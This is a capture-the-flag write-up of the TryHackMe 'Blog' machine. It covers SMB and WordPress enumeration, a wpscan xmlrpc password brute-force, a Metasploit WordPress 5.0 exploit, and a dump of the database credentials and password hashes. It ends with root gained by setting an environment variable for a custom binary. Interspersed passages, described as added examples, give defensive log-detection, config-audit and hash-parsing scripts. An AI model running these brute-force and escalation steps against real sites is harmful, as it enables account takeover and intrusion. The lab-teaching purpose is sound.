CTF-Writeups/TryHackMe/Blog.md
2020-11-12 02:57:42 +05:00


TryHackMe-Blog

NMAP

Nmap scan report for 10.10.62.12
Host is up (0.17s latency).                                                                                                                         
Not shown: 996 closed ports
PORT    STATE SERVICE     VERSION                                         
22/tcp  open  ssh         OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:                     
|   2048 57:8a:da:90:ba:ed:3a:47:0c:05:a3:f7:a8:0a:8d:78 (RSA)
|   256 c2:64:ef:ab:b1:9a:1c:87:58:7c:4b:d5:0f:20:46:26 (ECDSA)
|_  256 5a:f2:62:92:11:8e:ad:8a:9b:23:82:2d:ad:53:bc:16 (ED25519)
80/tcp  open  http        Apache httpd 2.4.29 ((Ubuntu))
|_http-generator: WordPress 5.0
| http-robots.txt: 1 disallowed entry  
|_/wp-admin/                     
|_http-server-header: Apache/2.4.29 (Ubuntu)          
|_http-title: Billy Joel's IT Blog – The IT blog
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP)
Service Info: Host: BLOG; OS: Linux; CPE: cpe:/o:linux:linux_kernel
                                     
Host script results:
|_nbstat: NetBIOS name: BLOG, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery:                                                                                                                                 
|   OS: Windows 6.1 (Samba 4.7.6-Ubuntu)                    
|   Computer name: blog                                                   
|   NetBIOS computer name: BLOG\x00                                       
|   Domain name: \x00
|   FQDN: blog
|_  System time: 2020-11-11T18:34:52+00:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2020-11-11T18:34:52
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 23.80 seconds

PORT 139/445 (SMB)

We know there are SMB shares on this box, so let's see which shares we can access.

Let's grab the two images from the share and save them on our local machine.

smb: \> get Alice-White-Rabbit.jpg
getting file \Alice-White-Rabbit.jpg of size 33378 as Alice-White-Rabbit.jpg (34.8 KiloBytes/sec) (average 34.8 KiloBytes/sec)
smb: \> get check-this.png
getting file \check-this.png of size 3082 as check-this.png (4.5 KiloBytes/sec) (average 22.3 KiloBytes/sec)
smb: \> 

One of them is a QR code image, so use zbarimg to read the text it encodes.

root@kali:~/TryHackMe/Medium/Blog# zbarimg check-this.png 
QR-Code:https://qrgo.page.link/M6dE

The link points to a YouTube video, Billy Joel - We Didn't Start the Fire (Official Video).

This seems like a rabbit hole...

root@kali:~/TryHackMe/Medium/Blog# steghide --extract -sf Alice-White-Rabbit.jpg 
Enter passphrase: 
wrote extracted data to "rabbit_hole.txt".
root@kali:~/TryHackMe/Medium/Blog# cat rabbit_hole.txt 
You've found yourself in a rabbit hole, friend.
root@kali:~/TryHackMe/Medium/Blog# 

And I was right about being on the wrong path :D

PORT 80

Moving on to the web page.

You're seeing the page like this because we have to add blog.thm to our /etc/hosts file.

Now it's loading properly

Looking at robots.txt

I found a WordPress login page.

Gobuster

gobuster dir -u http://blog.thm -w /usr/share/wordlists/big.txt

2020/11/11 23:56:33 Starting gobuster
===============================================================
/! (Status: 301)
/.htaccess (Status: 403)
/.htpasswd (Status: 403)
/0 (Status: 301)
/0000 (Status: 301)
/2020 (Status: 301)
/admin (Status: 302)
/asdfjkl; (Status: 301)
/atom (Status: 301)
/dashboard (Status: 302)
/embed (Status: 301)
/favicon.ico (Status: 200)
/feed (Status: 301)
/fixed! (Status: 301)
Progress: 9204 / 20470 (44.96%

I didn't find anything interesting with gobuster, so the WordPress login page is the only way in.

WPSCAN

I used wpscan to enumerate users and the WordPress version.

root@kali:~/TryHackMe/Medium/Blog# wpscan -e --url 10.10.62.12
_______________________________________________________________                                                                                     
         __          _______   _____                                                                                                                
         \ \        / /  __ \ / ____|                                 
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®                                                                                              
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \                                                                                               
            \  /\  /  | |     ____) | (__| (_| | | | |                                                                                              
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|                                                                                              
                                                                          
         WordPress Security Scanner by the WPScan Team                                                                                              
                         Version 3.8.4                                                                                                              
       Sponsored by Automattic - https://automattic.com/                                                                                            
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: http://10.10.62.12/ [10.10.62.12]
[+] Started: Thu Nov 12 00:15:15 2020

Interesting Finding(s):

[+] Headers
 | Interesting Entry: Server: Apache/2.4.29 (Ubuntu)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] http://10.10.62.12/robots.txt
 | Interesting Entries:
 |  - /wp-admin/
 |  - /wp-admin/admin-ajax.php
 | Found By: Robots Txt (Aggressive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://10.10.62.12/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
[i] User(s) Identified:

[+] bjoel
 | Found By: Wp Json Api (Aggressive Detection)
 |  - http://10.10.62.12/wp-json/wp/v2/users/?per_page=100&page=1
 | Confirmed By:
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

[+] kwheel
 | Found By: Wp Json Api (Aggressive Detection)
 |  - http://10.10.62.12/wp-json/wp/v2/users/?per_page=100&page=1
 | Confirmed By:
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

[+] Karen Wheeler
 | Found By: Rss Generator (Aggressive Detection)

[+] Billy Joel
 | Found By: Rss Generator (Aggressive Detection)

[!] No WPVulnDB API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 50 daily requests by registering at https://wpvulndb.com/users/sign_up

[+] Finished: Thu Nov 12 00:17:18 2020
[+] Requests Done: 3086
[+] Cached Requests: 30
[+] Data Sent: 762.895 KB
[+] Data Received: 1.192 MB
[+] Memory used: 230.801 MB
[+] Elapsed time: 00:02:03

I found two users, bjoel and kwheel. Let's put them in a text file and brute-force their passwords.

wpscan --url http://blog.thm -U users.txt  -P /usr/share/wordlists/rockyou.txt
_______________________________________________________________                                                                                     
         __          _______   _____
         \ \        / /  __ \ / ____|                   
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®                                                                                              
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \                                                                                               
            \  /\  /  | |     ____) | (__| (_| | | | |                                                                                              
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|                                                                                              
                                                                          
         WordPress Security Scanner by the WPScan Team                    
                         Version 3.8.4           
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart                    
_______________________________________________________________                                                                                     
                                                                          
[+] URL: http://blog.thm/ [10.10.62.12]                                   
[+] Started: Thu Nov 12 00:27:33 2020
                                                                          
Interesting Finding(s):                                                   
                                                                          
[+] Headers                                                                                                                                         
 | Interesting Entry: Server: Apache/2.4.29 (Ubuntu)       
 | Found By: Headers (Passive Detection)              
 | Confidence: 100%
                                                                          
[+] http://blog.thm/robots.txt                                            
 | Interesting Entries:
 [+] Enumerating All Plugins (via Passive Methods)                         
                                     
[i] No plugins Found.                                                     
                                                                          
[+] Enumerating Config Backups (via Passive and Aggressive Methods)       
 Checking Config Backups - Time: 00:00:01 <=======================================================================> (21 / 21) 100.00% Time: 00:00:01
                                                                          
[i] No Config Backups Found.                                              
                                     
[+] Performing password attack on Xmlrpc against 2 user/s                 
[SUCCESS] - kwheel / cutiepie1                                            
Trying bjoel / heaven1 Time: 00:07:54 <                                                                    > (6030 / 28691649)  0.02%                                      

It took some time, but we got kwheel's password.

And now we're logged in to WordPress as kwheel.
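The two wpscan runs above leave a very recognisable trail in the web server's access log: the user list came from GET requests to /wp-json/wp/v2/users and /?author=N, and the password attack is a burst of POSTs to /xmlrpc.php from one client. The detection script below is an added example written for this writeup, not part of the original post or of wpscan; the Apache log lines it analyses are constructed (client addresses 192.0.2.10 and 10.10.14.5, and the threshold and window values are assumed tuning choices). Note that wpscan drives xmlrpc with system.multicall, so each POST can carry many guesses; the request count therefore undercounts the attack, which is why even a modest burst is flagged.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta, timezone

# Apache "combined" access-log format; the sample lines further down are constructed,
# not taken from the box.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)

# Request shapes wpscan used on this box to list users.
ENUM_PATTERNS = {
    "rest-users": re.compile(r"^/wp-json/wp/v2/users(/|\?|$)"),  # Wp Json Api
    "author-id": re.compile(r"^/\?author=\d+$"),                  # Author Id Brute Forcing
}
XMLRPC_PATH = "/xmlrpc.php"
# Tuning values are assumptions; a single xmlrpc POST can carry many guesses via
# system.multicall, so even a modest count of POSTs from one client is suspicious.
XMLRPC_THRESHOLD = 10
WINDOW_SECONDS = 60


def parse_line(line):
    """Split one access-log line into its fields, or return None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    return rec


def analyse(lines):
    """Return (ip, kind, detail) findings for user enumeration and xmlrpc bursts."""
    findings = []
    xmlrpc_times = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        for name, pat in ENUM_PATTERNS.items():
            if pat.search(rec["path"]):
                findings.append((rec["ip"], "user-enumeration:" + name, rec["path"]))
        if rec["method"] == "POST" and rec["path"] == XMLRPC_PATH:
            xmlrpc_times[rec["ip"]].append(rec["ts"])
    for ip, times in xmlrpc_times.items():
        times.sort()
        start = 0
        for end in range(len(times)):
            # Sliding window: drop timestamps that fell out of the last WINDOW_SECONDS.
            while (times[end] - times[start]).total_seconds() > WINDOW_SECONDS:
                start += 1
            if end - start + 1 >= XMLRPC_THRESHOLD:
                findings.append((ip, "xmlrpc-brute-force",
                                 f"{end - start + 1} POSTs within {WINDOW_SECONDS}s"))
                break
    return findings


def build_sample_log():
    """Constructed log: one benign client (192.0.2.10) and one scanner (10.10.14.5)."""
    base = datetime(2020, 11, 12, 0, 27, 33, tzinfo=timezone.utc)

    def line(ip, method, path, status, offset):
        ts = (base + timedelta(seconds=offset)).strftime("%d/%b/%Y:%H:%M:%S %z")
        return f'{ip} - - [{ts}] "{method} {path} HTTP/1.1" {status} 512 "-" "Mozilla/5.0"'

    lines = [
        line("192.0.2.10", "GET", "/", 200, 0),
        line("192.0.2.10", "POST", "/xmlrpc.php", 200, 5),  # one pingback-style call, fine
        line("10.10.14.5", "GET", "/wp-json/wp/v2/users/?per_page=100&page=1", 200, 1),
        line("10.10.14.5", "GET", "/?author=1", 301, 2),
    ]
    lines += [line("10.10.14.5", "POST", "/xmlrpc.php", 200, 10 + 2 * i) for i in range(12)]
    return lines


if __name__ == "__main__":
    for ip, kind, detail in analyse(build_sample_log()):
        print(f"{ip:12} {kind:30} {detail}")
```

Run against a real log by feeding `analyse()` the lines of /var/log/apache2/access.log instead of `build_sample_log()`. The benign client makes a single xmlrpc call and is never reported; the scanner is reported once per enumeration request and once for the burst.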

Then I did a little research on Google to see if there's an exploit available for WordPress 5.0.

There's an exploit for it available in Metasploit.

You could also search for it with searchsploit; it shows up there since it's on Exploit-DB.

But I'll be using Metasploit, because if a tool is available, why not use it :D

I tried to use it but it kept failing; after quite some time I restarted Metasploit and then the exploit worked.

I didn't find anything in bjoel's home directory, so I quickly ran linpeas.

These are the things I found with linpeas:

define('DB_NAME', 'blog');
define('DB_USER', 'wordpressuser');
define('DB_PASSWORD', 'LittleYellowLamp90!@');
define('DB_HOST', 'localhost');

A MySQL database must be running on localhost, so let's try to log in with these credentials.

As we can see, DB_NAME is blog.
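The linpeas hit above is just the define() lines of wp-config.php. The web server account will always be able to read that file (WordPress needs it), so anyone who gets code execution as www-data gets the database password; what an admin can still control is whether every other local user can read it too, and whether the DB account is scoped to one database. The script below is an added example for this writeup, not code from the original post or from WordPress: it parses define('KEY', 'value'); lines the same way they appear on the page and reports the file mode. The wp-config fragment it uses is constructed (DB_NAME, DB_USER and DB_HOST mirror the box, the password is a placeholder), and the constant names in SECRET_KEYS are WordPress's real wp-config constants.

```python
import os
import re
import stat
import tempfile

# Matches define('KEY', 'value'); with either quote style, as written in wp-config.php.
DEFINE_RE = re.compile(
    r"""define\(\s*(['"])(?P<key>[A-Za-z0-9_]+)\1\s*,\s*(['"])(?P<value>.*?)\3\s*\)\s*;"""
)
# wp-config constants whose exposure matters most (real WordPress constant names).
SECRET_KEYS = {"DB_PASSWORD", "AUTH_KEY", "SECURE_AUTH_KEY", "LOGGED_IN_KEY", "NONCE_KEY",
               "AUTH_SALT", "SECURE_AUTH_SALT", "LOGGED_IN_SALT", "NONCE_SALT"}


def parse_wp_config(text):
    """Return {KEY: value} for every define('KEY', 'value'); in a wp-config.php body."""
    return {m.group("key"): m.group("value") for m in DEFINE_RE.finditer(text)}


def audit_wp_config(path):
    """Parse the file and report who besides the owner can read the secrets in it."""
    findings = []
    mode = os.stat(path).st_mode
    if mode & stat.S_IROTH:
        findings.append("world-readable")
    if mode & stat.S_IRGRP:
        findings.append("group-readable")
    with open(path) as fh:
        cfg = parse_wp_config(fh.read())
    for key in sorted(SECRET_KEYS & cfg.keys()):
        findings.append("secret present: " + key)
    return cfg, findings


# Constructed wp-config fragment; DB_NAME/DB_USER/DB_HOST mirror the box, the
# password is a placeholder.
SAMPLE_WP_CONFIG = """<?php
define('DB_NAME', 'blog');
define('DB_USER', 'wordpressuser');
define('DB_PASSWORD', 'ExamplePlaceholderPassword');
define( 'DB_HOST', "localhost" );
define('WP_DEBUG', 'false');
"""


def demo():
    """Write the sample to a temp file and audit it with a loose, then a tight, mode."""
    with tempfile.NamedTemporaryFile("w", suffix=".php", delete=False) as fh:
        fh.write(SAMPLE_WP_CONFIG)
        path = fh.name
    try:
        os.chmod(path, 0o644)            # common default: every local user can read it
        cfg, loose = audit_wp_config(path)
        os.chmod(path, 0o640)            # owner rw, web-server group read, nobody else
        _, tight = audit_wp_config(path)
    finally:
        os.unlink(path)
    return cfg, loose, tight


if __name__ == "__main__":
    cfg, loose, tight = demo()
    print(cfg)
    print("0644:", loose)
    print("0640:", tight)
```

Point `audit_wp_config()` at a real /var/www/html/wp-config.php to check an installation. The 0640 mode still shows "group-readable" because the web server group must read the file; that line is informational, whereas "world-readable" is the finding to fix.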

mysql> use blog
use blog
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
mysql> show tables;
show tables;
+-----------------------+
| Tables_in_blog        |
+-----------------------+
| wp_commentmeta        |
| wp_comments           |
| wp_links              |
| wp_options            |
| wp_postmeta           |
| wp_posts              |
| wp_term_relationships |
| wp_term_taxonomy      |
| wp_termmeta           |
| wp_terms              |
| wp_usermeta           |
| wp_users              |
+-----------------------+
12 rows in set (0.00 sec)

mysql> 

I ran a query to select all entries in wp_users:

mysql> select * from wp_users;
select * from wp_users;
+----+------------+------------------------------------+---------------+------------------------------+----------+---------------------+---------------------+-------------+---------------+
| ID | user_login | user_pass                          | user_nicename | user_email                   | user_url | user_registered     | user_activation_key | user_status | display_name  |
+----+------------+------------------------------------+---------------+------------------------------+----------+---------------------+---------------------+-------------+---------------+
|  1 | bjoel      | $P$BjoFHe8zIyjnQe/CBvaltzzC6ckPcO/ | bjoel         | nconkl1@outlook.com          |          | 2020-05-26 03:52:26 |                     |           0 | Billy Joel    |
|  3 | kwheel     | $P$BedNwvQ29vr1TPd80CDl6WnHyjr8te. | kwheel        | zlbiydwrtfjhmuuymk@ttirv.net |          | 2020-05-26 03:57:39 |                     |           0 | Karen Wheeler |
+----+------------+------------------------------------+---------------+------------------------------+----------+---------------------+---------------------+-------------+---------------+

Let's try cracking these hashes

But this was useless, as we already had that password.
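The user_pass values in the dump are phpass "portable" hashes, which WordPress used as its default for many years: "$P$" is the format tag, the next character ("B") is an index into the phpass alphabet giving the cost as a power of two (B = 13, so 8192 MD5 rounds), the next 8 characters are the salt, and the last 22 characters are the 16-byte digest in phpass's own base64 variant. The code below is an added example for this writeup, not the original post's code and not WordPress's own class, although it follows the published phpass algorithm; it parses the format and verifies a candidate password the way wp_check_password() does. The test password and the salt in phpass_hash() are constructed. The defensive takeaway is that 8192 rounds of MD5 is cheap on a GPU, so a weak password like the one recovered above falls quickly regardless of the salt; password strength and, on current WordPress releases, the stronger bcrypt default are what actually protect the table.

```python
import hashlib
import secrets

# phpass alphabet: the 4th character of the hash is an index into this string.
ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"


def _encode64(raw, count):
    """phpass's own base64 variant (not RFC 4648): 16 bytes become 22 characters."""
    out = []
    i = 0
    while i < count:
        value = raw[i]
        i += 1
        out.append(ITOA64[value & 0x3F])
        if i < count:
            value |= raw[i] << 8
        out.append(ITOA64[(value >> 6) & 0x3F])
        if i >= count:
            break
        i += 1
        if i < count:
            value |= raw[i] << 16
        out.append(ITOA64[(value >> 12) & 0x3F])
        if i >= count:
            break
        i += 1
        out.append(ITOA64[(value >> 18) & 0x3F])
    return "".join(out)


def parse_phpass(stored):
    """Break a $P$ / $H$ hash into cost, salt and digest; raise on anything else."""
    if stored[:3] not in ("$P$", "$H$") or len(stored) != 34:
        raise ValueError("not a phpass portable hash")
    cost_log2 = ITOA64.index(stored[3])
    if not 7 <= cost_log2 <= 30:               # phpass refuses out-of-range costs
        raise ValueError("invalid cost")
    return {"cost_log2": cost_log2, "iterations": 1 << cost_log2,
            "salt": stored[4:12], "digest": stored[12:]}


def phpass_crypt(password, setting):
    """Recompute the hash for `password` under the cost/salt found in `setting`."""
    p = parse_phpass(setting)
    pw = password.encode()
    h = hashlib.md5(p["salt"].encode() + pw).digest()
    for _ in range(p["iterations"]):       # do { md5(h . pw) } while (--count)
        h = hashlib.md5(h + pw).digest()
    return setting[:12] + _encode64(h, 16)


def check_password(password, stored):
    """Constant-time comparison, like WordPress's wp_check_password()."""
    return secrets.compare_digest(phpass_crypt(password, stored), stored)


def phpass_hash(password, cost_log2=13):
    """Make a fresh hash with a random 8-char salt (used here to build a test vector)."""
    salt = "".join(secrets.choice(ITOA64) for _ in range(8))
    return phpass_crypt(password, "$P$" + ITOA64[cost_log2] + salt + "x" * 22)


if __name__ == "__main__":
    print(parse_phpass("$P$BjoFHe8zIyjnQe/CBvaltzzC6ckPcO/"))   # bjoel's hash from the dump
    h = phpass_hash("correct horse battery staple")             # constructed test password
    print(h, check_password("correct horse battery staple", h))
```

Feeding `parse_phpass()` either row from the wp_users dump shows the same cost (8192 rounds) and a per-user salt; `check_password()` is the verification step a login performs, and the fact that it costs only about 8192 MD5 calls is exactly why these hashes are weak against offline guessing.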

I then tried to run /usr/sbin/checker, and it looked like a custom binary.

This looks like Buffer Overflow exploitation

This tells us that there's a variable holding the value of the bash variable $admin, and the binary checks whether it's empty or not. On a null value it terminates, so we need to set the value to true.

www-data@blog:/media$ export admin=true
export admin=true
www-data@blog:/media$ echo $admin
echo $admin
true
www-data@blog:/media$ /usr/sbin/checker
/usr/sbin/checker
root@blog:/media#